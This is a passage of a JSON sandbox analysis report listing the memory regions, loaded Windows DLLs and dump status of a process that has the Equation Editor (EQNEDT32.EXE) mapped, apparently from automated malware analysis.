"dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 1245184, "type": "region", "version": 1 }, "end_va": 1261567, "entry_point": 0, "filename": null, "id": "region_354", "name": 
"pagefile_0x0000000000130000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1245184, "timestamp": "00:00:22.539", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1310720, "type": "region", "version": 1 }, "end_va": 1314815, "entry_point": 0, "filename": null, "id": "region_355", "name": "pagefile_0x0000000000140000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1310720, "timestamp": "00:00:22.539", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 581632, "start_va": 4194304, "type": "region", "version": 1 }, "end_va": 4775935, "entry_point": 4194304, "filename": "\\Program Files\\Common Files\\microsoft shared\\EQUATION\\EQNEDT32.EXE", "id": "region_356", "name": "eqnedt32.exe", "norm_filename": "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe", "region_type": "memory_mapped_file", "start_va": 4194304, "timestamp": "00:00:22.539", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1294336, "start_va": 1995767808, "type": "region", "version": 1 }, "end_va": 1997062143, "entry_point": 1995767808, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_357", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 1995767808, "timestamp": "00:00:22.728", "type": "region", "version": 1 }, { "dump": { 
"filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 1998127104, "type": "region", "version": 1 }, "end_va": 1998131199, "entry_point": 1998127104, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_358", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 1998127104, "timestamp": "00:00:22.728", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2147155968, "type": "region", "version": 1 }, "end_va": 2147299327, "entry_point": 0, "filename": null, "id": "region_359", "name": "pagefile_0x000000007ffb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2147155968, "timestamp": "00:00:22.728", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000360-addr_0x000000007ffd3000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_23", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147299328, "type": "region", "version": 1 }, "end_va": 2147303423, "entry_point": 0, "filename": null, "id": "region_360", "name": "private_0x000000007ffd3000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147299328, "timestamp": "00:00:22.728", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000361-addr_0x000000007ffdf000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": 
"Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_24", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147348480, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_361", "name": "private_0x000000007ffdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147348480, "timestamp": "00:00:22.728", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000362-addr_0x0000000000210000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_25", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 2162688, "type": "region", "version": 1 }, "end_va": 3211263, "entry_point": 0, "filename": null, "id": "region_362", "name": "private_0x0000000000210000", "norm_filename": null, "region_type": "private_memory", "start_va": 2162688, "timestamp": "00:00:22.751", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 303104, "start_va": 1965424640, "type": "region", "version": 1 }, "end_va": 1965727743, "entry_point": 1965424640, "filename": "\\Windows\\System32\\KernelBase.dll", "id": "region_363", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\system32\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1965424640, "timestamp": "00:00:22.751", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], 
"ref_process_dump": null, "size": 868352, "start_va": 1992359936, "type": "region", "version": 1 }, "end_va": 1993228287, "entry_point": 1992359936, "filename": "\\Windows\\System32\\kernel32.dll", "id": "region_364", "name": "kernel32.dll", "norm_filename": "c:\\windows\\system32\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1992359936, "timestamp": "00:00:22.751", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_365", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:00:22.762", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 1376256, "type": "region", "version": 1 }, "end_va": 1798143, "entry_point": 1376256, "filename": "\\Windows\\System32\\locale.nls", "id": "region_366", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 1376256, "timestamp": "00:00:22.762", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 540672, "start_va": 1915289600, "type": "region", "version": 1 }, "end_va": 1915830271, "entry_point": 1915289600, "filename": 
"\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll", "id": "region_367", "name": "comctl32.dll", "norm_filename": "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll", "region_type": "memory_mapped_file", "start_va": 1915289600, "timestamp": "00:00:22.762", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 659456, "start_va": 1967259648, "type": "region", "version": 1 }, "end_va": 1967919103, "entry_point": 1967259648, "filename": "\\Windows\\System32\\rpcrt4.dll", "id": "region_368", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\system32\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1967259648, "timestamp": "00:00:22.808", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1967980544, "type": "region", "version": 1 }, "end_va": 1968635903, "entry_point": 1967980544, "filename": "\\Windows\\System32\\advapi32.dll", "id": "region_369", "name": "advapi32.dll", "norm_filename": "c:\\windows\\system32\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1967980544, "timestamp": "00:00:22.808", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12886016, "start_va": 1971388416, "type": "region", "version": 1 }, "end_va": 1984274431, "entry_point": 1971388416, "filename": 
"\\Windows\\System32\\shell32.dll", "id": "region_370", "name": "shell32.dll", "norm_filename": "c:\\windows\\system32\\shell32.dll", "region_type": "memory_mapped_file", "start_va": 1971388416, "timestamp": "00:00:22.808", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1984299008, "type": "region", "version": 1 }, "end_va": 1984339967, "entry_point": 1984299008, "filename": "\\Windows\\System32\\lpk.dll", "id": "region_371", "name": "lpk.dll", "norm_filename": "c:\\windows\\system32\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1984299008, "timestamp": "00:00:22.809", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 319488, "start_va": 1985806336, "type": "region", "version": 1 }, "end_va": 1986125823, "entry_point": 1985806336, "filename": "\\Windows\\System32\\gdi32.dll", "id": "region_372", "name": "gdi32.dll", "norm_filename": "c:\\windows\\system32\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 1985806336, "timestamp": "00:00:22.809", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 823296, "start_va": 1986134016, "type": "region", "version": 1 }, "end_va": 1986957311, "entry_point": 1986134016, "filename": "\\Windows\\System32\\user32.dll", "id": "region_373", "name": "user32.dll", "norm_filename": "c:\\windows\\system32\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1986134016, "timestamp": "00:00:22.809", "type": 
"region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1425408, "start_va": 1986985984, "type": "region", "version": 1 }, "end_va": 1988411391, "entry_point": 1986985984, "filename": "\\Windows\\System32\\ole32.dll", "id": "region_374", "name": "ole32.dll", "norm_filename": "c:\\windows\\system32\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 1986985984, "timestamp": "00:00:22.809", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1988427776, "type": "region", "version": 1 }, "end_va": 1989070847, "entry_point": 1988427776, "filename": "\\Windows\\System32\\usp10.dll", "id": "region_375", "name": "usp10.dll", "norm_filename": "c:\\windows\\system32\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1988427776, "timestamp": "00:00:22.809", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1989083136, "type": "region", "version": 1 }, "end_va": 1989185535, "entry_point": 1989083136, "filename": "\\Windows\\System32\\sechost.dll", "id": "region_376", "name": "sechost.dll", "norm_filename": "c:\\windows\\system32\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1989083136, "timestamp": "00:00:22.809", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": 
null, "size": 704512, "start_va": 1994653696, "type": "region", "version": 1 }, "end_va": 1995358207, "entry_point": 1994653696, "filename": "\\Windows\\System32\\msvcrt.dll", "id": "region_377", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\system32\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1994653696, "timestamp": "00:00:22.809", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1997668352, "type": "region", "version": 1 }, "end_va": 1998024703, "entry_point": 1997668352, "filename": "\\Windows\\System32\\shlwapi.dll", "id": "region_378", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\system32\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1997668352, "timestamp": "00:00:22.809", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2137980928, "type": "region", "version": 1 }, "end_va": 2139029503, "entry_point": 0, "filename": null, "id": "region_379", "name": "pagefile_0x000000007f6f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2137980928, "timestamp": "00:00:22.809", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000380-addr_0x0000000000200000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_26", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 2097152, "type": "region", "version": 1 }, "end_va": 2162687, 
"entry_point": 0, "filename": null, "id": "region_380", "name": "private_0x0000000000200000", "norm_filename": null, "region_type": "private_memory", "start_va": 2097152, "timestamp": "00:00:22.819", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 819200, "start_va": 3211264, "type": "region", "version": 1 }, "end_va": 4030463, "entry_point": 0, "filename": null, "id": "region_381", "name": "pagefile_0x0000000000310000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3211264, "timestamp": "00:00:22.819", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 126976, "start_va": 1984364544, "type": "region", "version": 1 }, "end_va": 1984491519, "entry_point": 1984364544, "filename": "\\Windows\\System32\\imm32.dll", "id": "region_382", "name": "imm32.dll", "norm_filename": "c:\\windows\\system32\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 1984364544, "timestamp": "00:00:22.819", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1991507968, "type": "region", "version": 1 }, "end_va": 1992343551, "entry_point": 1991507968, "filename": "\\Windows\\System32\\msctf.dll", "id": "region_383", "name": "msctf.dll", "norm_filename": "c:\\windows\\system32\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1991507968, "timestamp": "00:00:22.819", "type": "region", "version": 1 }, { "dump": { "filename": 
"process_00000002-region_00000384-addr_0x0000000000020000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_27", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_384", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:00:22.876", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000385-addr_0x00000000001c0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_28", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 1835008, "type": "region", "version": 1 }, "end_va": 1839103, "entry_point": 0, "filename": null, "id": "region_385", "name": "private_0x00000000001c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1835008, "timestamp": "00:00:22.877", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000386-addr_0x00000000001f0000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_29", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 2031616, "type": "region", "version": 1 }, "end_va": 2097151, "entry_point": 0, "filename": null, "id": "region_386", "name": "private_0x00000000001f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2031616, "timestamp": "00:00:22.877", "type": "region", "version": 1 }, { "dump": { 
"filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1052672, "start_va": 4784128, "type": "region", "version": 1 }, "end_va": 5836799, "entry_point": 0, "filename": null, "id": "region_387", "name": "pagefile_0x0000000000490000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4784128, "timestamp": "00:00:22.877", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12582912, "start_va": 5898240, "type": "region", "version": 1 }, "end_va": 18481151, "entry_point": 0, "filename": null, "id": "region_388", "name": "pagefile_0x00000000005a0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5898240, "timestamp": "00:00:22.877", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000389-addr_0x00000000012f0000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_30", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 19857408, "type": "region", "version": 1 }, "end_va": 19922943, "entry_point": 0, "filename": null, "id": "region_389", "name": "private_0x00000000012f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 19857408, "timestamp": "00:00:22.877", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000390-addr_0x0000000001300000-size_0x0000000000400000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], 
"ref_process_dump": { "ref_id": "proc_dump_31", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4194304, "start_va": 19922944, "type": "region", "version": 1 }, "end_va": 24117247, "entry_point": 0, "filename": null, "id": "region_390", "name": "private_0x0000000001300000", "norm_filename": null, "region_type": "private_memory", "start_va": 19922944, "timestamp": "00:00:22.878", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2359296, "start_va": 1892483072, "type": "region", "version": 1 }, "end_va": 1894842367, "entry_point": 1892483072, "filename": "\\Windows\\System32\\msi.dll", "id": "region_391", "name": "msi.dll", "norm_filename": "c:\\windows\\system32\\msi.dll", "region_type": "memory_mapped_file", "start_va": 1892483072, "timestamp": "00:00:22.878", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 57344, "start_va": 1038221312, "type": "region", "version": 1 }, "end_va": 1038278655, "entry_point": 1038221312, "filename": "\\Program Files\\Common Files\\microsoft shared\\EQUATION\\1033\\EEINTL.DLL", "id": "region_392", "name": "eeintl.dll", "norm_filename": "c:\\program files\\common files\\microsoft shared\\equation\\1033\\eeintl.dll", "region_type": "memory_mapped_file", "start_va": 1038221312, "timestamp": "00:00:22.926", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1962868736, "type": "region", "version": 
1 }, "end_va": 1962917887, "entry_point": 1962868736, "filename": "\\Windows\\System32\\cryptbase.dll", "id": "region_393", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\system32\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1962868736, "timestamp": "00:00:22.927", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 262144, "start_va": 1945108480, "type": "region", "version": 1 }, "end_va": 1945370623, "entry_point": 1945108480, "filename": "\\Windows\\System32\\uxtheme.dll", "id": "region_394", "name": "uxtheme.dll", "norm_filename": "c:\\windows\\system32\\uxtheme.dll", "region_type": "memory_mapped_file", "start_va": 1945108480, "timestamp": "00:00:22.928", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1900544, "type": "region", "version": 1 }, "end_va": 1904639, "entry_point": 0, "filename": null, "id": "region_395", "name": "pagefile_0x00000000001d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1900544, "timestamp": "00:00:22.933", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 913408, "start_va": 18481152, "type": "region", "version": 1 }, "end_va": 19394559, "entry_point": 0, "filename": null, "id": "region_396", "name": "pagefile_0x00000000011a0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 18481152, "timestamp": 
"00:00:22.933", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000397-addr_0x00000000018f0000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_32", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 26148864, "type": "region", "version": 1 }, "end_va": 26411007, "entry_point": 0, "filename": null, "id": "region_397", "name": "private_0x00000000018f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 26148864, "timestamp": "00:00:22.933", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 585728, "start_va": 1968701440, "type": "region", "version": 1 }, "end_va": 1969287167, "entry_point": 1968701440, "filename": "\\Windows\\System32\\oleaut32.dll", "id": "region_398", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\system32\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 1968701440, "timestamp": "00:00:22.933", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 536576, "start_va": 1990918144, "type": "region", "version": 1 }, "end_va": 1991454719, "entry_point": 1990918144, "filename": "\\Windows\\System32\\clbcatq.dll", "id": "region_399", "name": "clbcatq.dll", "norm_filename": "c:\\windows\\system32\\clbcatq.dll", "region_type": "memory_mapped_file", "start_va": 1990918144, "timestamp": "00:00:22.933", "type": "region", "version": 1 }, { "dump": { "filename": 
"process_00000002-region_00000400-addr_0x0000000001700000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_33", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 24117248, "type": "region", "version": 1 }, "end_va": 25165823, "entry_point": 0, "filename": null, "id": "region_400", "name": "private_0x0000000001700000", "norm_filename": null, "region_type": "private_memory", "start_va": 24117248, "timestamp": "00:00:23.069", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000401-addr_0x0000000001930000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_34", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 26411008, "type": "region", "version": 1 }, "end_va": 27459583, "entry_point": 0, "filename": null, "id": "region_401", "name": "private_0x0000000001930000", "norm_filename": null, "region_type": "private_memory", "start_va": 26411008, "timestamp": "00:00:23.069", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 1958150144, "type": "region", "version": 1 }, "end_va": 1958240255, "entry_point": 1958150144, "filename": "\\Windows\\System32\\cryptsp.dll", "id": "region_402", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\system32\\cryptsp.dll", "region_type": "memory_mapped_file", "start_va": 1958150144, "timestamp": "00:00:23.069", "type": "region", "version": 1 }, { "dump": { "filename": 
"process_00000002-region_00000403-addr_0x000000007ffdd000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_35", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147340288, "type": "region", "version": 1 }, "end_va": 2147344383, "entry_point": 0, "filename": null, "id": "region_403", "name": "private_0x000000007ffdd000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147340288, "timestamp": "00:00:23.070", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000404-addr_0x000000007ffde000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_36", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147344384, "type": "region", "version": 1 }, "end_va": 2147348479, "entry_point": 0, "filename": null, "id": "region_404", "name": "private_0x000000007ffde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147344384, "timestamp": "00:00:23.070", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 241664, "start_va": 1955659776, "type": "region", "version": 1 }, "end_va": 1955901439, "entry_point": 1955659776, "filename": "\\Windows\\System32\\rsaenh.dll", "id": "region_405", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\system32\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 1955659776, "timestamp": "00:00:23.082", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No 
dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 27459584, "type": "region", "version": 1 }, "end_va": 30404607, "entry_point": 27459584, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_406", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 27459584, "timestamp": "00:00:23.086", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 57344, "start_va": 1963524096, "type": "region", "version": 1 }, "end_va": 1963581439, "entry_point": 1963524096, "filename": "\\Windows\\System32\\RpcRtRemote.dll", "id": "region_407", "name": "rpcrtremote.dll", "norm_filename": "c:\\windows\\system32\\rpcrtremote.dll", "region_type": "memory_mapped_file", "start_va": 1963524096, "timestamp": "00:00:23.086", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 1966080, "type": "region", "version": 1 }, "end_va": 1994751, "entry_point": 0, "filename": null, "id": "region_408", "name": "pagefile_0x00000000001e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1966080, "timestamp": "00:00:24.041", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 4063232, "type": "region", "version": 
